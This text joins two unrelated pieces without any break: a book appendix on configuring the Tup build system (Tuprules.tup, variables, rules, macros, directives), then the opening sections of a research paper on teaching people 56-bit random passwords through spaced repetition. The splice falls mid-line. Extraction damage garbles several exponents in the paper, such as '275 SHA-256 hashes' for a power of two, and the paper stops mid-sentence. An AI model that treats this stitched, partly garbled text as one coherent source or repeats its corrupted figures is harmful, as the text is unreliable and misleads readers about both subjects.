Initializing a source-code tree to be used with Tup is extremely simple. Just execute
tup init
in the top-level directory and you will be set.
Upwards Recursion
What makes Tup perhaps unique in its approach is that it recursively manages the whole
build tree (or, optionally, smaller parts of it) by scanning the tree upwards. This means
that when you execute
tup upd
the tree is scanned upwards for configuration files, and all directories with Tupfile are
processed to be on-synch. You may alternatively choose to run
tup upd .
to limit the synchronisation (build) to the current working directory.
259
260 APPENDIX C. MANAGING BUILDS WITH TUP
C.2 Using Tup
C.2.1 Tuprules.tup
It’s a good idea to have a top-level Tuprules.tup file to set up things such as aliases
for build commands. Here is a simple rules file which I use for my operating system
project (additions to come in later).
Tuprules.tup
CC = gcc
LD = ld
CFLAGS = -g -Wall -O
!cc = |> ^ CC %f^ $(CC) $(CFLAGS) $(CFLAGS_%B) -c %f -o %o |> %B.o
!ld = |> ^ LD %f^ $(LD) $(LDFLAGS) $(LDFLAGS_%B) -o %o %f |>
Notes
Environment variables are used much like in Unix shell scripts; here, I set CC (C
compiler) to point to gcc, LD (linker) to point to ld, and CFLAGS (C compiler
flags) to a useful default of -g -Wall -O; produce debugger output, turn on many
warnings, and do basic optimisations.
Aliases start with ’ !’; I set aliases for C compiler and linker (!cc and !ld, respec-
tively).
C.2.2 Tup Syntax
C.2.3 Variables
Environment Variables
Tup lets us assign environment variables much like Unix shells do; e.g., to assign the
value gccto the variable CC, you would use the syntax
CC = gcc
or
CC := gcc
You can then refer to this variable like
$(CC)
in your Tup script files.
Conventional Environment Variables
Here comes a list of some commonly used environment variables and their purposes.
C.2. USING TUP 261
CC C compiler command
LD linker command
AS assembler command
CFLAGS C compiler flags
LDFLAGS linker flags
ASFLAGS assembler flags
Predefined @-Variables
TUP_CWD path relative to the current Tupfile being parsed
TUP_ARCH target-architecture for building objects
TUP_PLATFORM target operating system
Notes
@-variables can be specified in tup.config -files. For example, if you specify
CONFIG_PROJECT in tup.config, you can refer to it as @(PROJECT) in
Tupfile.
@-variables differ from environment variables in two ways; they are read-only,
and they are treated as dependencies; note that exported environment variables
are dependencies as well.
Example tup.config
# tup.config for the zero project
CONFIG_PROJECT=zero
CONFIG_RELEASE=0.0.1
It is possible to set CONFIG_-varibles to the value ’ n’ by having comments like
# CONFIG_RELEASE is not set
C.2.4 Rules
Tup rules take the following syntax
: [foreach] [inputs] [ | order-only inputs] |> command |> [outputs] [ | extra outputs]
[{bin}]
Notes
’[’ and ’ ]’ are used to denote optional fields.
’|’ is used to separate fields.
foreach is used to run one command per input file; if omitted, all input files are
used as arguments for a single command.
inputs -field lists filenames; shell-style wildcards ’ ?’ and ’ *’ are supported.
order-only inputs are used as inputs but the filenames are not present in %-
flags . This is useful e.g. for specifying dependencies on files such as headers
generated elsewhere; Tup shall know to generate those files first without execut-
ing the command.
262 APPENDIX C. MANAGING BUILDS WITH TUP
outputs specifies the names of the files to be written by command.
extra outputs are additional output files whose names do not appear in the
%o-flag .
{bin} can be used to group outputs into bins; later rules can use " {bin} " as an
input to use all filenames in the bin. As an example, the foreach rule will put all
output files into the objs bin .
C.2.5 Macros
The following is an example macro to specify the C compiler and default flags to be
used with it.
!cc = |> ˆCC %f ˆ$(CC) $(CFLAGS) $(CFLAGS_%B) -c %f -o %o |> %B.o
Notes
Macros take ’ !’ as their prefix, in contrast with rules being prefixed with ’ :’.
ˆCC %fˆ controls what is echoed to the user when the command is run; note
that the space after the first ’ ˆ’ is required; the letters immediately following the
ˆwould be flags.
%B evalutes to the name of the current file without the extension ; similarly, %f
is the name of the current input file, and %ois the name of the current output
file.
C.2.6 Flags
ˆ-flags
the ’ c’ flag causes the command to run inside a chroot-environment (currently
under Linux and OSX), so that the effective working directory of the subprocess
is different from the current working directory.
%-flags
%f the current filename from the inputs section
%b the basename (path stripped) of the current input file
%B like %b, but strips the filename extension
%e the extension of current file with foreach
%o the name(s) of output file(s) in the cammand section
%O like %o, but without the extension
%d the name of the lowest-level directory in path
C.2.7 Directives
ifeq (val1,val2)
C.2. USING TUP 263
The ifeq-directive tells Tup to do the things before the next endif or else in case val1
is found to be equal to val2. Note that any spaces included within the parentheses are
processed verbatim. All $- and @-variables are substituted within val1 and val2.
ifneq (val1,val2)
The ifneq-directive inverts the logic of ifeq; the following things are done if val1 is not
equal with val2.
ifdef V ARIABLE
The things before the next endif shall be done if the @-variable is defined at all in
tup.config.
ifndef V ARIABLE
ifndef inverts the logic of ifdef.
else
else toggles the logical truth value of the previous ifeq/ifneq/ifdef/ifndef statement.
endif
Ends the previous ifeq/ifneq/ifdef/ifndef statement.
include file
Reads a regular file and continues parsing the current Tupfile.
include_rules
Scans the directory tree up for the first Tuprules.tup file and then reads all Tuprules.tup
files from it down to the one possibly in the current directory. Usually specified as the
first line in Tupfile.
run ./script args
Run an external script with the given arguments to generate :-rules . The script is
expected to write the :-rules to standard output (stdout). The script cannot create $-
variables or !-macros, but it can output :-rules that use those features.
preload directory
By default, run-scripts can only use wild-cards for files in the current directory. To
specify other wild-card directories to be scanne, you can use preload .
export V ARIABLE
Adds the environment variable V ARIABLE to be used by future :-rules and run-scripts.
V ARIABLE comes from environment, not the Tupfile, so you can control the contents
using your shell. On Unix-systems, only PATH is exported by default.
.gitignore
Tells Tup to automatically generate a .gitignore file with a list of Tup-generated output
files.
#
# at the beginning of a line marks the line as a comment.Towards reliable storage of 56-bit secrets in human memory
Joseph Bonneau
Princeton UniversityStuart Schechter
Microsoft Research
Abstract
Challenging the conventional wisdom that users cannot
remember cryptographically-strong secrets, we test the
hypothesis that users can learn randomly-assigned 56-
bit codes (encoded as either 6 words or 12 characters)
through spaced repetition . We asked remote research
participants to perform a distractor task that required log-
ging into a website 90 times, over up to two weeks, with
a password of their choosing. After they entered their
chosen password correctly we displayed a short code (4
letters or 2 words, 18.8 bits) that we required them to
type. For subsequent logins we added an increasing de-
lay prior to displaying the code, which participants could
avoid by typing the code from memory. As participants
learned, we added two more codes to comprise a 56.4-
bit secret. Overall, 94% of participants eventually typed
their entire secret from memory, learning it after a me-
dian of 36 logins. The learning component of our system
added a median delay of just 6.9 s per login and a to-
tal of less than 12 minutes over an average of ten days.
88% were able to recall their codes exactly when asked
at least three days later, with only 21% reporting having
written their secret down. As one participant wrote with
surprise, “the words are branded into my brain.” While
our study is preliminary in nature, we believe it debunks
the myth that users are inherently incapable of remem-
bering cryptographically-strong secrets for a select few
high-stakes scenarios, such as a password for enterprise
login or as a master key to protect other credentials (e.g.,
in a password manager).
1 Introduction
Humans are incapable of securely storing high-quality cryp-
tographic keys, and they have unacceptable speed and accu-
racy when performing cryptographic operations. (They are
also large, expensive to maintain, difficult to manage, and they
pollute the environment. It is astonishing that these devicescontinue to be manufactured and deployed. But they are suf-
ficiently pervasive that we must design our protocols around
their limitations.)
—Kaufman, Perlman and Speciner, 2002 [60]
The dismissal of human memory by the security com-
munity reached the point of parody long ago. While as-
signing random passwords to users was considered stan-
dard as recently in the mid-1980s [29], the practice died
out in the 90s [4] and NIST guidelines now presume all
passwords are user-chosen [35]. Most banks have even
given up on expecting customers to memorize random
four-digits PINs [24].
We hypothesized that perceived limits on humans’
ability to remember secrets are an artifact of today’s sys-
tems, which provide users with a single brief opportunity
during enrolment to permanently imprint a secret pass-
word into long-term memory. By contrast, modern theo-
ries of the brain posit that it is important to forget random
information seen once, with no connection to past expe-
rience, so as to avoid being overwhelmed by the constant
flow of new sensory information [10].
We hypothesized that, if we could relax time con-
straints under which users are expected to learn, most
could memorize a randomly-assigned secret of 56 bits.
To allow for this memorization period, we propose using
an alternate form of authentication while learning, which
may be weaker or less convenient than we would like in
the long-term. For example, while learning a strong se-
cret used to protect an enterprise account, users might
be allowed to login using a user-chosen password, but
only from their assigned computer on the corporate net-
work and only for a probationary period. Or, if learning a
master key for their password manager, which maintains
a database of all personal credentials, users might only
be allowed to upload this database to the network after
learning a strong secret used to encrypt it.
By relaxing this time constraint we are able to ex-
ploit spaced repetition , in which information is learned
Figure 1: The login form for a user logging in for the first
time, learning a code made of letters .
through exposure separated by significant delay inter-
vals. Spaced repetition was identified in the 19thcen-
tury [47] and has been robustly shown to be among the
most effective means of memorizing unstructured infor-
mation [38, 11]. Perhaps the highest praise is its popu-
larity amongst medical students, language learners, and
others who are highly motivated to learn a large amount
of vocabulary as efficiently as possible [37, 107].
To test our hypothesis, we piggybacked spaced repeti-
tion of a new random secret onto an existing login pro-
cess utilizing a user-chosen password. Our system can be
seen in action in Figure 1. After receiving a user’s self-
chosen password, we add a new field into which they
must type a random security code, which we display di-
rectly above this field. With each login we add a1
3second
delay (up to a maximum of 10 seconds) before display-
ing the hint for them to copy, encouraging them to type
the code from memory if possible to save time.
We recruited remote research participants to perform a
study that required logging into a website 90 times over
up to 15 days, which they did at an average rate of nine
logins per day. We assigned each participant a random
56-bit ‘security code’ encoded into three chunks of either
four lowercase letters or two words. After participants
began to enter the first chunk before it was displayed, we
added a second and likewise for the third and final chunk.
We did not tell participants that learning the random se-
cret was a goal of the research study; they simply learned
it to save time. Participants experienced a median addi-
tional delay from using our system of just 6.9 s on each
login, or about 11 m 53 s total over the entire study.
Three days after participants completed the initial
study and had stopped using their security codes, we
asked them to recall their code from memory in a follow-
up survey which 88% completed. They returned after
a median of 3 days 18 hours (mean 4 days 23 hours).
We found that 46 of 56 (82%) assigned letters and 52 of
56 (93%) assigned words recalled their codes correctly.
Only 21% reported writing down or otherwise storing the
security codes outside their memory and the recall rate
was actually higher amongst those who didn’t.
While 56-bit secrets are usually overkill for web au-
thentication, the most common use of passwords to-
day, there are several compelling applications for “highvalue” passwords such as master passwords for pass-
word managers, passwords used to protect private keys,
device-unlock passwords, and enterprise login pass-
words where cryptographically-strong passwords can
eliminate an entire class of attack. In debunking the
myth that users are inherently incapable of remembering
a strong secret, we advocate that using spaced repetition
to train users to remember strong secrets should be avail-
able in every security engineer’s toolbox.
2 Security goals
Evaluating the difficulty of guessing user-chosen pass-
words is messy [62] and security engineers are left with
few hard guarantees beyond empirical estimates of min-
entropy, which can be as low as 10 bits or fewer [19]. By
contrast, with random passwords we can easily provide
strong bounds of the difficulty of guessing , if not other
attack vectors against passwords [22].
2.1 The cost of brute-force
Random passwords are primarily a defense against an of-
fline attack (eq.brute-force attack ), in which the attacker
is capable of trying as many guesses as they can afford to
check computationally. The largest public brute-forcing
of a cryptographic key was a 64-bit RC5 key broken
in 2002 by distributed.net . We can estimate the
cost of brute-force by observing the Bitcoin network [3],
which utilizes proof-of-work with SHA-256 to maintain
integrity of its transaction ledger and hence provides di-
rect monetary rewards for efficient brute force. While
SHA-256 is just one example of a secure hash function,
it provides a reasonable benchmark.
In 2013, Bitcoin miners collectively performed ≈275
SHA-256 hashes in exchange for bitcoin rewards worth
≈US$257Mat the time of computation. This provides
only a rough estimate as Bitcoin’s price has fluctuated
and Bitcoin miners may have profited from carrying sig-
nificant exchange-rate risk or utilizing stolen electricity.
Still, this is the only publicly-known operation perform-
ing in excess of 264cryptographic operations and hence
provides the best estimate available. Even assuming a
centralized effort could be an order of magnitude more
efficient, this still leaves us with an estimate of US$1M to
perform a 270SHA-256 evaluations and around US$1B
for 280evaluations.
In most scenarios, we can gain equivalent security
with a smaller secret by key stretching , deliberately mak-
ing the verification function computationally expensive
for both the attacker and legitimate users [75, 63]. Clas-
sically, this takes the form of an iterated hash func-
tion, though there are more advanced techniques such as
2
memory-bound hashes like scrypt [79] or halting pass-
word puzzles which run forever on incorrect guesses and
require costly backtracking [28].
With simple iterated password hashing, a modern CPU
can compute a hash function like SHA-256 at around
10 MHz [1] (10 million SHA-256 computations per sec-
ond), meaning that if we slow down legitimate users by
≈2 ms we can add 14 bits to the effective strength of
a password, and we can add 24 bits at a cost of ≈2 s.
While brute-forcing speed will increase as hardware im-
proves [41], the same advances enable defenders to con-
tinuously increase [84] the amount of stretching in use at
constant real-world cost [21], meaning these basic num-
bers should persist indefinitely.
2.2 Practical attack scenarios
Given the above constraints, we consider a 56-bit ran-
dom password a reasonable target for most practical sce-
narios, pushing the attacker cost around US$1M with 14
bits (around 2 ms) of stretching, or US$1B with 24 bits
(around 2 s) of stretching. Defending against offline at-
tacks remains useful in several scenarios.
Password managers are a compelling aid to the diffi-
culty of remembering many passwords online, but they
reduce security for all of a user’s credentials to the
strength of a master password used to encrypt them at
rest. In at least one instance, a password management
service suffered a breach of the systems used to store
users’ data [70]. Given that password managers only
need to decrypt the credentials at startup, several seconds
of stretching may be acceptable.
Similarly, when creating a public/private key pair for
personal communication, users today typically use a
password to encrypt the private key file to guard against
theft. Given a sufficiently strong random password, users
could use their password and a unique public salt (e.g.,
an email address) to seed a random number generator and
create the keys. The private key could then simply be re-
derived when needed from the password, preventing the
need for storing the private key at all. This application
also likely tolerates extensive stretching.
Passwords used to unlock personal devices (e.g.
smartphones) are becoming increasingly critical as these
devices are often a second factor (or sole factor) in au-
thentication to many other services. Today, most devices
use relatively weak secrets and rely on tamper-proof
hardware to limit the number of guesses if a device is
stolen. Strong passwords could be used to remove trust in
device hardware. This is a more challenging application,
however. The budget for key-stretching may be 14 bits or
fewer, due to the frequency with which users authenticate
and the limited CPU and battery resources available. Ad-
ditionally, entering strong passwords quickly on a smalltouchscreen may be prohibitive.
Finally, when authenticating users remotely, such as
logging into an enterprise network, security requirements
may motivate transitioning from user-chosen secrets to
strong random ones. Defending against online guessing ,
in which the attacker must verify password guesses us-
ing the genuine login server as an oracle, can be done
with far smaller random passwords. Even without ex-
plicit rate-limiting, attacking a 40-bit secret online would
generate significantly more traffic than any practical sys-
tem routinely handles. 40-bit random passwords would
ensure defense-in-depth against failures in rate-limiting.
Alternately, attackers may perform an offline attack
if a remote authentication server is breached. In gen-
eral, we would favor back-end defenses against pass-
word database compromises which don’t place an addi-
tional burden on users—such as hashing passwords with
a key kept in special-purpose hardware, dividing infor-
mation up amongst multiple servers [57] or one limited-
bandwidth server [45]. Random passwords would also
frustrate brute-force in this scenario, although the oppor-
tunity for key-stretching is probably closer to the 2 ms
(14 bit) range to limit load on the login server.
2.3 Metrics for guessing difficulty
As a baseline for the security provided by assigned pass-
words, we must compare to the guessing resistance of-
fered by human-chosen passwords. Analyzing the re-
sistance to guessing attacks of user-chosen passwords is
challenging as the true distribution of passwords chosen
by a given population of users is unknown and likely im-
possible to precisely learn given the number of humans
on the planet [19]. Yet it is important for our purposes to
have a reasonable estimate of the difficulty of guessing
user-chosen passwords to justify the security benefit of
switching to machine-chosen passwords.
A conservative statistical metric of guessing resistance
for user-chosen passwords is min-entropy H ∞=−log2p
where pis the probability of the most common password
chosen by a given population. This metric can be pre-
cisely estimated with relatively small samples and cap-
tures the security of the weakest passwords in a distribu-
tion, which are most likely to be compromised by online
guessing. Estimates based on leaked empirical data sug-
gests that H∞≈6–8 bits for web users given no password
restrictions. This means that users with the weakest pass-
words would benefit from switching to a machine chosen
password consisting of a single random byte.
A more comprehensive statistical metric is partial
work-factor  ̃G, with the1
2-work-factor for a given pop-
ulation indicating the number of guesses per user an at-
tacker must average to have a 50% chance of guessing
successfully [20]. Empirical estimates suggest that  ̃G1
2≈
3
20 bits [19], meaning that the majority of users would
benefit from switching to a 20-bit machine chosen pass-
word. Notably, this estimate suggests that against a sys-
tem with permissive rate-limiting, perhaps as many as
half of users are susceptible to optimal online guessing
attacks.
These statistical metrics provide a lower bound, as
real attackers will have imperfect knowledge of the
population-wide distribution of passwords and hence
guess less efficiently than optimal. An empirical metric
to capture this is guess number which measures the aver-
age effort required by real cracking software to compro-
mise a certain percentage of passwords chosen by a given
population. Depending on the password policy imposed
on users, estimates from simulated passwords collected
in user studies suggests that 230–243passwords will be
guessed by available cracking algorithms before 50% of
passwords are compromised [62].
It must be noted that all of these estimates derive from
either leaked web passwords or passwords created in ar-
tificial studies, which mirror web passwords but with a
significant portion of users intentionally choosing pass-
words differently than they would in real life [48]. As
we don’t consider random passwords suitable for mass
deployment on the web, we are mostly interested enter-
prise login and password-based encryption for which we
have little available data. It is possible that users choose
far more secure passwords for these scenarios, although
there is little evidence on the web that users choose bet-
ter passwords for more security-critical accounts [20].
Regardless, it is reasonable to take estimates from web
passwords as a lower bound for conservative security de-
sign.
3 Design
Given our estimation that a 56-bit secret can provide
acceptable security against feasible brute-force attacks
given a strong hash function and reasonable key stretch-
ing, our goal was to design a simple prototype interface
that could train users to learn 56 bits secret with as little
burden as possible.
Spaced repetition [47, 80, 69] typically employs de-
lays (spacings) of increasing length between rehearsals
of the chunk of information to be memorized. While pre-
cisely controlling rehearsal spacing makes sense in appli-
cations where education is users’ primary goal, we did
not want to interrupt users from their work. Instead, we
chose to piggyback learning on top of an already-existing
interruption in users’ work-flow—the login process it-
self. We allow users to employ a user-chosen password
for login, then piggyback learning of our assigned secret
at the end of the login step. We split the 56-bit secret up
into three equal-sized chunks to be learned sequentially,to enable a gradual presentation and make it as easy as
possible for users to start typing from memory.
3.1 Encoding the secret
Although previous studies have found no significant dif-
ferences in user’s ability to memorize a secret encoded
as words or letters [89, 71], we implemented both encod-
ings. For letters , we used a string of 12 lowercase letters
chosen uniformly at random from the English alphabet to
encode a 2612≈56.4 bit secret. The three chunks of the
secret were 4 letters each (representing ≈18.8 bits each).
Forwords , we chose a sequence of 6 short, common
English words. To keep security identical to that of the
letters case, we created our own list of 676 (262) pos-
sible words such that 6 words chosen uniformly at ran-
dom would encode a 6766=2612≈56.4 bit secret. We
extracted all 3–5 English nouns, verbs and adjectives
(which users tend to prefer in passwords [26, 100]) from
Wiktionary, excluding those marked as vulgar or slang
words and plural nouns. We also manually filtered out
potentially insulting or negative words. From these can-
didate words we then greedily built our dictionary of 676
words by repeatedly choosing the most common remain-
ing word, ranked by frequency in the Google N-gram
web corpus [30]. After choosing each word we then re-
moved all words within an edit distance of two from the
remaining set of candidates to potentially allow limited
typo correction. We also excluded words which were a
complete prefix of any other word, to potentially allow
auto-complete. We present the complete list in Table 4.
3.2 Login form and hinting
Unlike typical login forms, we do not present a button
to complete sign-in, but rather automatically submit the
password for verification via AJAX each time a character
is typed. Above the password field we display the word
“verifying” while awaiting a response and “not yet cor-
rect” while the current text is not the correct password.
After the user’s self-chosen password is verified, a text
box for entering the first chunk of the user’s assigned
code appears to the right of the password field, as we
show in Figure 1. On the first login, we display the
correct value of the chunk immediately above the field
into which users must enter it. In the version used for
our study, we included a pop-up introducing the security
code and its purpose:
Due to concerns about stolen accounts and bonuses, we are giv-
ing you an additional security code. To finish logging in, simply
type the [four letters |two words] above the text box. Your code
will not change, so once you have learned it, try to type it before
the hint appears.
We color each character a user enters into the security
4
code field green if it is correct and red if incorrect. We re-
place correct characters with a green circle after 250 ms.
With each consecutive login, we delay the appearance
of the hint by1
3of a second for each time the user has
previously seen the chunk, up to a maximum of 10 sec-
onds. If the user types a character correctly before the
delay expires, we start the delay countdown again. We
selected these delay values with the goal of imposing the
minimal annoyance necessary to nudge users to start typ-
ing from memory.
After a user enters a chunk without seeing the hint on
three consecutive logins, we add another chunk. In the
version used in our study, we show a pop-up which can
be dismissed for all future logins:
Congratulations! You have learned the first [four letters |two
words] of your security code. We have added another [four let-
ters|two words]. Just like the first [four letters |two words],
once you have learned them, you can type them without waiting
for the hint to appear.
When we detect that a user has finished typing the
first chunk of their security code, we automatically tab
(moved the cursor) to the text field for the second chunk
and then start the delay for that chunk’s hint. After typ-
ing the second chunk correctly from memory three times
in a row, we add the third and final chunk. In the version
used in the study, we also displayed one more pop-up:
Congratulations! You have learned the first [eight letters |four
words] of your security code. We have added a final [four letters
|two words]. These are the last [four letters |two words] we
will ask you to learn. Once you have learned them, you can type
them before the hint appears. Once you know the full code, we
can use it to protect your account.
We illustrate the login process from our study, using
all three chunks, in Figure 2. In a real deployment, once
the user is consistently typing the entire security code
from memory, entering their self-chosen password would
no longer be necessary.
We disable pasting and automatic form-filling for the
security code field to encourage users to type from mem-
ory. We allow users to type their code in lower or upper
case, with all non-letter characters being ignored, includ-
ing spaces between words as no word is a prefix of any
other word. During training we automatically insert a
space at the end of any entered code word so users learn
that they do not need to type the spaces. We selected
the edit-distance properties of our dictionary of words
to facilitate automatic typo correction for most single-
character typos, though we did not implement this.
4 Experimental Methodology
We used a remote online study to evaluate our system.
To keep participants from realizing the purpose of our
Figure 2: The login form for a user in who has just re-
ceived the third security code chunk words .
Figure 3: The Attention Game, our distractor task
study was the security codes and potentially altering their
behavior, we presented our study as a psychology study
with the security codes a routine part of logging in to
participate. We recruited participants using Amazon’s
Mechanical Turk (MTurk) platform [65] and paid them
to participate, which required logging in 90 times in 15
days. For completeness, we provide exact study materi-
als in the appendices.
4.1 The distractor task
We intended our distractor task to provide a plausible
object of study that would lead us to ask participants to
log in to our website repeatedly (distracting participants
from the subject of our investigation) and to require a
non-trivial mental effort (distracting them from making
conscious efforts to memorize their security codes). Yet
we also wanted the distractor task to be relatively fast,
interesting, and challenging, since we were asking par-
ticipants to perform a large number of logins.
We designed a game to resemble descendants of the
classic psychological study that revealed the Stroop ef-
fect, in which participants are asked to say the name of a
color of the ink used to print a word, when the word itself
is sometimes the name of another color [94]. Our game
measured participants’ ability to ignore where a word
appeared (the left or right side of their screen) and re-
spond to the meaning of the word itself. Each 60-second
game consisted of 10 trials during which either the word
5
‘left’ or ‘right’ would appear in one of two squares on the
screen, as illustrated in Figure 3. The words appeared in
a random square after a random delay of 2–4 seconds,
after which participants were asked to immediately press
thefkey upon seeing the word ‘left’ or jkey upon see-
ing the word ‘right’ (corresponding to the left and right
sides of a QWERTY keyboard). During the game, par-
ticipants saw a score based on their reaction time, with
penalties for pressing the wrong key.
4.2 Treatments
We randomly assigned participants to three treatments:
letters (40% of participants), words (40%), and control
(20%). Participants in the letters andwords treatments
received security codes consisting of letters and words,
respectively, as described in Section 3.1. Participants
in the control treatment received no security code at all
and saw a simple password form for all logins; we in-
cluded this treatment primarily to gauge whether the ad-
ditional security codes were causing participants to drop
out of the experiment more than traditional authentica-
tion would have.
4.3 Recruiting
We recruited participants to our study using Ama-
zon’s Mechanical Turk by posting a Human Intelligence
Task (HIT) titled “60-Second Attention Study”, paying
US$0.40, and requiring no login. When participants
completed the game, we presented them with an offer to
“Earn $19 by being part of our extended study” (a screen-
shot of the offer is in Figure 8 of the Appendix). The of-
fer stated that participants would be required to play the
game again 90 times within 15 days, answer two short
questions before playing the game, wait 30 minutes after
each game before starting a new game session, and that
they would have to login for each session. We warned
participants that those who joined the extended study but
did not complete it would not receive partial payment.
Our study prominently listed Microsoft Research as the
institution responsible for the study. As we did not want
to place an undue burden on workers who were not inter-
ested in even reading our offer, we provided a link with
a large boldface heading titled “Get paid now for your
participation in this short experiment” allowing partici-
pants to be paid immediately without accepting, or even
reading, our offer.
When workers who had performed the single-game
HIT signed up to participate in our 90-game attention
study, we presented them with a sign-up page displaying
our approved consent form and asking them to choose a
username and a password of at least six characters. It also
displayed their workerId so that the participant would
Figure 4: Participants were asked to fill out this two-
question survey before every attention game.
know we were associating their study account with their
Mechanical Turk account for payment.For the 88 logins
following signup (games 2–89), and for login to the fi-
nal session (in which we did not show the game but in-
stead showed the final survey), we required participants
to login using the chosen password and security code (if
assigned a non- control treatment).
Amazon’s policies forbid HITs that require workers to
sign up for accounts on websites or to provide their email
addresses. These rules prevent a number of abusive uses
of Mechanical Turk. They also protect Amazon’s busi-
ness by forbidding requesters from recruiting workers,
establishing a means of contact that bypasses Amazon,
and then paying hired workers for future tasks without
paying Amazon for its role in recruiting the workers. Our
HIT was compliant with the letter of these rules because
we only required workers to play the attention game, and
they were in no way obligated to sign up for the full at-
tention study. We were also compliant with the spirit of
the rules, as we were not asking workers to engage in
abusive actions and we did not cut Amazon out of their
role as market maker—we paid participants for the 90-
game attention study by posting a bonus for the HIT they
already completed through Amazon.
As in any two-week project, some participants re-
quested extensions to the completion deadline in order to
reach 90 completed game. We provided 24-hour exten-
sions to participants who were within 20 games of com-
pleting the study at the deadline.
4.4 Sessions
After each login we presented a very short survey (shown
in Figure 4) asking participants about their recent sleep
and eating. This was designed solely to support the pur-
ported goal of the study and we ignored the responses.
After participants completed the survey we immedi-
ately displayed the “Attention Game”. When they com-
pleted the game, we overlaid a timer on top of the page
counting down 30 minutes until they could again fill out
the survey and play the game (see Figure 5). The timer
also counted down in the title of the page, so that partic-
ipants would see the countdown when browsing in other
tabs and know when they were next allowed to play. If
6
Figure 5: After completing an attention test, participants
could not perform another one for 30 minutes.
participants tried to log into the website again before the
30-minute waiting period was complete, we displayed
the countdown again, starting from the amount of time
remaining since they last completed the game.
4.5 Completion survey
When participants logged in for the 90thand final time,
we skipped the game and displayed our completion sur-
vey. We provide the full text of the survey (with partici-
pants’ answer counts) in Appendix A. We started the sur-
vey with demographic questions and then asked partici-
pants if they had written down or stored their passwords
or assigned security codes outside of their memory.
We then debriefed participants about the true nature of
the study, explaining that the security code was the focus
of the study, though we did not reveal that we planned
a follow-up study. We could not defer the debriefing
to the follow-up study, as participants had not commit-
ted to engage with us beyond the end of the study and
might not accept invitations for future contact. Further,
as some participants would finish the study earlier than
others and receive the follow-up, we could not be certain
that participants would not communicate to each other
what they had learned.Indeed, some participants reported
discussing the study in forums, but as we had entrusted
those who finished the study with the truth, they returned
that trust by respecting forum rules against ‘spoilers’ in
all cases we are aware of.
To aid with the follow-up study, we asked participants
to provide their email address, stating the question in a
manner that we hoped would minimize suspicion that a
formal follow-up study was imminent.
If our analysis raises more questions about your experi-
ence during the study, may we contact you and ask you toanswer a few questions in return for an additional bonus?
If so, provide your email below. (This is optional!)
4.6 Payment
We paid $20 to participants who completed the study, as
opposed to the $19 promised, to show extra gratitude for
their participation. We informed participants of this only
after they had completed the ‘attention’ study and filled
out their post-deception ethics questionnaire, so as to not
taint their responses about the ethics of the deception.
However, this payment came shortly after the ‘attention’
study and thus well before the invitation to the follow-
up study. Receiving a payment exceeding what we had
promised may have increased participants’ receptiveness
to that invitation.
Despite telling participants they would not be paid un-
less they completed the study, we did pay $0.20 per login
to all participants who logged into the site at least once
after signing up. We did so because we couldn’t be cer-
tain that the extra work of entering a security code didn’t
cause some participants to drop out. While we had indi-
cated that each session might take three minutes, and we
didn’t promise that the login page would only include a
password. We wanted to ensure that if participants found
the security code so arduous as to quit, they would not
lose out on payment for the attention tests they did com-
plete. We did not reveal this fact to the participants who
completed the study and filled out the ethics survey as
we feared they might communicate it to those who had
yet to finish.
4.7 Follow-ups
At least 72 hours after a non-control group participant
completed the study, we emailed them an invitation to
perform an additional HIT for $1 (this email is repro-
duced in Appendix C). Most participants provided an
email address in the final survey of the attention study;
we tried to contact those who didn’t via Mechanical
Turk. When participants accepted the HIT, we identified
them by their Mechanical Turk ID so that they did not
need to provide a username or password. We verifiedo
verify that they’d participated in the main study.1
The follow-up study contained only one question:
Please try to recall and enter the security code that we as-
signed you during the attention study.
If you stored or wrote down your security code, please
do not look it up. We are only interested in knowing what
you can recall using only your memory . It’s OK if you
don’t remember some or all of it. Just do the best you can.
1We failed to verify that it had been three days since they completed
the study, requiring us to disqualify three participants who discovered
the follow-up study prematurely (see Section 5.1).
7
We presented participants with three text fields for the
three chunks of their security code. Unlike the data-entry
field used when they logged in for the attention experi-
ment, we used plain text fields without any guidance as to
whether the characters typed were correctand without au-
tomatic typing of spaces for the words treatment. We ac-
cepted all responses from participants that arrived within
two weeks of their completion of the study.
We emailed all participants who completed the first
follow-up again 14 days after they completed it with the
offer to complete a second identical follow-up for an ad-
ditional $1 reward.
4.8 Ethics
The experiment was performed by Microsoft Research
and was reviewed and approved by the organization’s
ethics review process prior to the start of our first pilot.2
We employed deception to mask the focus of our re-
search out of concern that participants might work harder
to memorize a code if they knew it to be the focus of
our study. We took a number of steps to minimize the
potential for our deception to cause harm or make feel
participants feel that they were treated unjustly. We pro-
vided participants with estimates for the amount of time
to complete the study padded to include the unanticipated
time to enter the security code. While we told partic-
ipants they would not be paid if they did not complete
the study, we did make partial payments. We monitored
how participants responded to the deception, investigat-
ing the responses of pilot participants before proceeding
with the full study and continued to monitor participants
in the full study, using a standard post-deception survey
hosted by the Ethical Research Project [97]. We also of-
fered participants the opportunity to withdraw their con-
sent for use data derived from their participants. The vast
majority of participants had no objection to the decep-
tion and none asked to have their data withdrawn. We
provide more detail on participants’ ethics responses in
Appendix D.
Our use of Amazon’s Mechanical Turk complied their
terms of use both in letter and spirit, as we detailed in
Section 4.3.
5 Results
We present overall analysis of the most important results
from our study: participant’s ability to learn and recall
2The first author started a position at Princeton after the research
was underway. He was not involved in the execution of the study or
communications with participants. He did not have access to the email
addresses of those participants who volunteered to provide them (the
only personally-identifiable information collected).security codes. We present a full accounting of partici-
pants’ responses to the multiple-choice questions of our
final survey and the complete text of that survey in Ap-
pendix A, including demographics which reflect the typ-
ical MTurk population [86].
5.1 Recruitment and completion
We offered our initial attention-game task to roughly 300
workers from February 3–5, 2014. 251 workers accepted
the offer to participate in the 90-login attention study for
$19 by completing the sign-up page and playing the first
game. We stopped inviting new participants when we
had reached roughly 100 sign-ups for our two experi-
mental groups. Participants’ assigned treatment had no
effect until they returned after sign-up and correctly en-
tered their username and chosen password into the login
page, so we discard the 28 who signed up but never re-
turned. We categorize the 223 participants who did re-
turn in Table 1.
5.1.1 Dropouts
Inserting a security-code learning step into the login pro-
cess creates an added burden for participants. Of par-
ticipants who completed the study, typing (and waiting
for) the security codes added a median delay of 6.9 s per
login. To measure the impact of this burden, we tested
the hypothesis that participants assigned a security code
would be less likely to complete the experiment than
those in the control . The null hypothesis is that group
assignment has no impact on the rate of completion.
Indeed, the study-completion rates in the fourth row
of Table 1 are higher for control than the experimental
groups. We use a two-tailed Fisher’s Exact Test to com-
pare the proportion of participants who completed the
study between those assigned a security code (the union
of the letters andwords treatments, or 133 of 170) to that
of the control (35 of 41). The probability of this dif-
ference occurring by chance under the null hypothesis is
p=0.2166. While this is far from the threshold for sta-
tistical significance, such a test cannot be used to reject
